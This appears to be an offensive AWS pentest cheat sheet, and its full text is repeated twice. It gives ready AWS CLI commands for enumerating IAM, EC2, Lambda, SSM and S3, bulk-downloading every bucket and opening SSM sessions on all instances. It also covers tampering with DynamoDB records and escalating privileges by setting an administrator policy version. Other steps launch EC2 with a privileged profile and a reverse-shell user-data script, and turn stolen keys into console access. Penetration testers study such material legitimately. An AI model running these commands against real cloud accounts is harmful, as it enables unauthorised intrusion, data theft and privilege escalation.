AWS Cli

Install and add key:

pip3 install awscli
aws configure

# other userful tools
pip install awscli ansi2html detect-secrets boto3 principalmapper botocore defusedxml enum python_dateutil lxml signxmlManual

Enum:

Users/Groups:

# list all user's info
aws iam list-users

# list current user's info
aws iam get-user

# list all access keys
aws iam list-access-keys

# list all groups
aws iam list-groups

# list users, for a given group
aws iam get-group --group-name FullAdmins

Policies:

# list all policies
aws iam list-policies

# get a specific policy
aws iam get-policy --policy-arn <value>

# list all users, groups, and roles, for a given policy
aws iam list-entities-for-policy --policy-arn <value>

# get-account-password-policy
aws iam get-account-password-policy

Ec2:

# list all instances
aws ec2 describe-instances --region REGION --profile PROFILE| jq ".[][].Instances | .[] | {InstanceId, KeyName, State}"

# list all keypairs
aws ec2 describe-key-pairs

# import an existing keypair
aws ec2 import-key-pair --key-name keyname_test --public-key-material file:///id_rsa.pub

# push ssh keys 
aws ec2-instance-connect send-ssh-public-key --instance-id i-001234a4bf70dec41EXAMPLE --zone us-west-2b --instance-os-user ec2-user --public-key file://my_key.pub

# list all security groups
aws ec2 describe-security-groups

# Extract user data: 
aws ec2 get-launch-template-data --instance i-EXAMPLE
aws ec2 get-launch-template-data --instance i-EXAMPLE | jq ".[].UserData" | sed 's/"//' | sed 's/"//' | base64 -d

Lambda:

# List lambda
aws lambda list-functions --region REGION --profile PROFILE

# get lambda
aws lambda get-function --function-name "LAMDBA NAME" --query 'Code.Location' --region us-east-1

SSM:

# list ssm instances 
aws ssm describe-instance-information --profile PROFILE --region REGION
aws ssm describe-instance-information --region us-east-1 --profile pentest_readonly_user | grep InstanceId | awk '{ print $2}' | sed 's/"//' | sed 's/",//'

# start session
aws ssm start-session --target InstanceID --region REGION --profile PROFILE

# connect to all: 
aws ssm describe-instance-information  --profile PROFILE --region us-east-2 | grep -i instanceid | awk '{print $2}' | sed 's/"//' | sed 's/",//' > ssm_list.txt
while read line; do aws ssm start-session --profile PROFILE --region us-east-2 --target  $line; done < ssm_list.txt

S3:

S3Api:

# list buckets: 
aws s3api list-buckets --query "Buckets[].Name" --output json | sed 's/\[//' | sed 's/    "//' | sed 's/",//' | sed 's/\]//' | tee s3.txt

## Public enumeration 
while read line; do [[ $(curl -s https://$line.s3.amazonaws.com | grep 'Access Denied') ]] &&  { echo '\033[0;31m[-] '$line' HTTPS Denied Access' } || { echo '\033[32m[+] '$line' HTTPS Potential access -  check @ https://'$line'.s3.amazonaws.com' }   && [[ $(curl -s http://$line.s3.amazonaws.com | grep 'Access Denied') ]] &&  { echo '\033[0;31m[-] '$line' HTTP Denied Access' } || { echo '\033[32m[+] '$line' HTTP Potential access -  check @ http://'$line'.s3.amazonaws.com' } ; done < s3.txt
while read line; do curl http://$line.s3.amazonaws.com; done < s3.txt

## Authenticated enum
while read line; do aws s3 cp s3://$line . --recursive | tee $line; done < s3.txt

## Automate
aws s3api list-buckets --query "Buckets[].Name" --output json | sed 's/\[//' | sed 's/    "//' | sed 's/",//' | sed 's/"//' | sed 's/\]//' | tee s3.txt
while read line; do mkdir $line && aws s3 cp s3://$line $line --recursive | tee $line; done < s3.txt

DynamoDB:

# list tables:
aws dynamodb list-tables
# get table data 
aws dynamodb scan --table-name blog-users
# update - put export into file and then update it with wanted value 
aws dynamodb put-item --table-name blog-users --item file://user_item

RDS:

# show RDS instances
aws rds describe-db-instances --region us-east-1

Privesc:

Policy based:

# Create new default policy
aws iam create-policy-version –policy-arn target_policy_arn –policy-document file://path/to/administrator/policy.json –set-as-default
# Set new default policy to existing version  - Where “v2” is the policy version with the most privileges available.
aws iam set-default-policy-version –policy-arn target_policy_arn –version-id v2

# Create Ec2 with existing policy 
aws ec2 run-instances –image-id ami-a4dc46db –instance-type t2.micro –iam-instance-profile Name=iam-full-access-ip –key-name my_ssh_key –security-group-ids sg-123456
# or 
aws ec2 run-instances –image-id ami-a4dc46db –instance-type t2.micro –iam-instance-profile Name=iam-full-access-ip –user-data file://script/with/reverse/shell.sh

Escalate:

Tools:

Upgrade to console access:

git clone https://github.com/NetSPI/aws_consoler
aws_consoler -v -a AKIA -s SECRET

PreviousEnumeration NextAWS Cli

Last updated 3 months ago

AWS Cli

Install and add key:

pip3 install awscli
aws configure

# other userful tools
pip install awscli ansi2html detect-secrets boto3 principalmapper botocore defusedxml enum python_dateutil lxml signxmlManual

Enum:

Users/Groups:

# list all user's info
aws iam list-users

# list current user's info
aws iam get-user

# list all access keys
aws iam list-access-keys

# list all groups
aws iam list-groups

# list users, for a given group
aws iam get-group --group-name FullAdmins

Policies:

# list all policies
aws iam list-policies

# get a specific policy
aws iam get-policy --policy-arn <value>

# list all users, groups, and roles, for a given policy
aws iam list-entities-for-policy --policy-arn <value>

# get-account-password-policy
aws iam get-account-password-policy

Ec2:

# list all instances
aws ec2 describe-instances --region REGION --profile PROFILE| jq ".[][].Instances | .[] | {InstanceId, KeyName, State}"

# list all keypairs
aws ec2 describe-key-pairs

# import an existing keypair
aws ec2 import-key-pair --key-name keyname_test --public-key-material file:///id_rsa.pub

# push ssh keys 
aws ec2-instance-connect send-ssh-public-key --instance-id i-001234a4bf70dec41EXAMPLE --zone us-west-2b --instance-os-user ec2-user --public-key file://my_key.pub

# list all security groups
aws ec2 describe-security-groups

# Extract user data: 
aws ec2 get-launch-template-data --instance i-EXAMPLE
aws ec2 get-launch-template-data --instance i-EXAMPLE | jq ".[].UserData" | sed 's/"//' | sed 's/"//' | base64 -d

Lambda:

# List lambda
aws lambda list-functions --region REGION --profile PROFILE

# get lambda
aws lambda get-function --function-name "LAMDBA NAME" --query 'Code.Location' --region us-east-1

SSM:

# list ssm instances 
aws ssm describe-instance-information --profile PROFILE --region REGION
aws ssm describe-instance-information --region us-east-1 --profile pentest_readonly_user | grep InstanceId | awk '{ print $2}' | sed 's/"//' | sed 's/",//'

# start session
aws ssm start-session --target InstanceID --region REGION --profile PROFILE

# connect to all: 
aws ssm describe-instance-information  --profile PROFILE --region us-east-2 | grep -i instanceid | awk '{print $2}' | sed 's/"//' | sed 's/",//' > ssm_list.txt
while read line; do aws ssm start-session --profile PROFILE --region us-east-2 --target  $line; done < ssm_list.txt

S3:

S3Api:

# list buckets: 
aws s3api list-buckets --query "Buckets[].Name" --output json | sed 's/\[//' | sed 's/    "//' | sed 's/",//' | sed 's/\]//' | tee s3.txt

## Public enumeration 
while read line; do [[ $(curl -s https://$line.s3.amazonaws.com | grep 'Access Denied') ]] &&  { echo '\033[0;31m[-] '$line' HTTPS Denied Access' } || { echo '\033[32m[+] '$line' HTTPS Potential access -  check @ https://'$line'.s3.amazonaws.com' }   && [[ $(curl -s http://$line.s3.amazonaws.com | grep 'Access Denied') ]] &&  { echo '\033[0;31m[-] '$line' HTTP Denied Access' } || { echo '\033[32m[+] '$line' HTTP Potential access -  check @ http://'$line'.s3.amazonaws.com' } ; done < s3.txt
while read line; do curl http://$line.s3.amazonaws.com; done < s3.txt

## Authenticated enum
while read line; do aws s3 cp s3://$line . --recursive | tee $line; done < s3.txt

## Automate
aws s3api list-buckets --query "Buckets[].Name" --output json | sed 's/\[//' | sed 's/    "//' | sed 's/",//' | sed 's/"//' | sed 's/\]//' | tee s3.txt
while read line; do mkdir $line && aws s3 cp s3://$line $line --recursive | tee $line; done < s3.txt

DynamoDB:

# list tables:
aws dynamodb list-tables
# get table data 
aws dynamodb scan --table-name blog-users
# update - put export into file and then update it with wanted value 
aws dynamodb put-item --table-name blog-users --item file://user_item

RDS:

# show RDS instances
aws rds describe-db-instances --region us-east-1

Privesc:

Policy based:

# Create new default policy
aws iam create-policy-version –policy-arn target_policy_arn –policy-document file://path/to/administrator/policy.json –set-as-default
# Set new default policy to existing version  - Where “v2” is the policy version with the most privileges available.
aws iam set-default-policy-version –policy-arn target_policy_arn –version-id v2

# Create Ec2 with existing policy 
aws ec2 run-instances –image-id ami-a4dc46db –instance-type t2.micro –iam-instance-profile Name=iam-full-access-ip –key-name my_ssh_key –security-group-ids sg-123456
# or 
aws ec2 run-instances –image-id ami-a4dc46db –instance-type t2.micro –iam-instance-profile Name=iam-full-access-ip –user-data file://script/with/reverse/shell.sh

Escalate:

Tools:

Upgrade to console access:

git clone https://github.com/NetSPI/aws_consoler
aws_consoler -v -a AKIA -s SECRET

PreviousEnumeration NextAWS Cli

Last updated 3 months ago